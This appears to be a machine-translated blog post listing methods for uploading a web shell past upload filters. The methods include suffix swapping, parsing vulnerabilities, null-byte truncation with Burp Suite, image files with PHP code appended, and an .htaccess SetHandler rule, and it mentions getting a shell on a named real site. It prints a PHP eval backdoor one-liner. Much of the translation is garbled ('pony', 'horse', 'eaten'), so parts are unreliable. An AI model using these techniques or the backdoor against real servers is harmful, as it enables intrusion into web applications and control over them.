Shell upload Bypass detection method

Shell Upload conditions:

1, Upload point

2. Absolute path

3, to have permission

Start uploading (try uploading the pony first, then upload the horse, because sometimes the horse is more likely to be eaten)

1, directly upload the shell, that is, PHP files (do not limit the file type)

2. Change the suffix

Upload other files that allow upload formats, such as PNG, JPG. Then change the suffix PHP (on the front side to verify the black and white list)

3, the use of parsing vulnerability (that is, after the absolute path of the file plus/xx.php)

Uploading files, such as PNG, with parsing vulnerabilities (Web servers with parsing vulnerabilities)

4. Unrecognized suffix

Uploading for example a SHELL.PHP.ABC file, the server is looking forward for the resolvable suffix name because it does not recognize the ABC suffix.

5, 00 truncation

Upload similar shell.php.jpg files, change hex value with Burpsuit, find the shell.php.jpg in hex and replace the value of the second point (I remember 2e) to 00 and then click Forward (to release the package)

6. Picture Horse

In the win system cmd can easily combine php files with jpg or PNG files, example copy/b 1.jpg+1.php shell.jpg can be combined with the image code, because some servers will detect the image header, if not the picture header is not allowed to upload. The combination of the picture and the code can effectively hide the Trojan horse. Do not forget to upload a php file here, you can use the above methods

7. htaccess file attack upload shell

The. htaccess file is a configuration file in the Apache server that is responsible for the configuration of the Web page in the relevant directory. Through the htaccess file, you can: page 301 redirect, customize 404 page, change file extension , allow/ Features such as blocking access to specific users or directories, prohibiting directory listings, and configuring default documents.

①, write. htaccess file

The code that needs to be used is as follows:

<filesmatch "Cimer" >

SetHandler application/x-httpd a PHP

</FilesMatch>

(through the. htaccess file, call the PHP parser to parse a file name as long as it contains "Cimer" the string of arbitrary files.) ）

Then save the file (name, type below)

650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M02/08/2D/wKiom1ndOpXDqV6YAABkUwjXLlQ579.png-wh_500x0-wm_ 3-wmp_4-s_292673403.png "title=" D0e8b2dbec3540a78767783660a1fe97_th.png "alt=" Wkiom1ndopxdqv6yaabkuwjxllq579.png-wh_50 "/>

②, uploading. htaccess files

③, change the shell suffix to cimer

④, then upload Shell.cimer

⑤, then you can connect the

If you do not understand to see the reference http://www.sohu.com/a/125498727_609556

Upload a lot of methods, there are a variety of wonderful way to bypass, I know is bucket, here on the case of the miracle record, in order to prevent later forget.

Example: Pirate Cloud Trader member change Avatar Burpsuit grab the bag and add file size under Content-type to Getshell

or upload pictures and then join the Trojan, you can Getshell (here is a problem, that is, <?php @eval ($_post[' aaa ')?> sentence is no semicolon, there are good points But not successful)

Shell upload Bypass detection method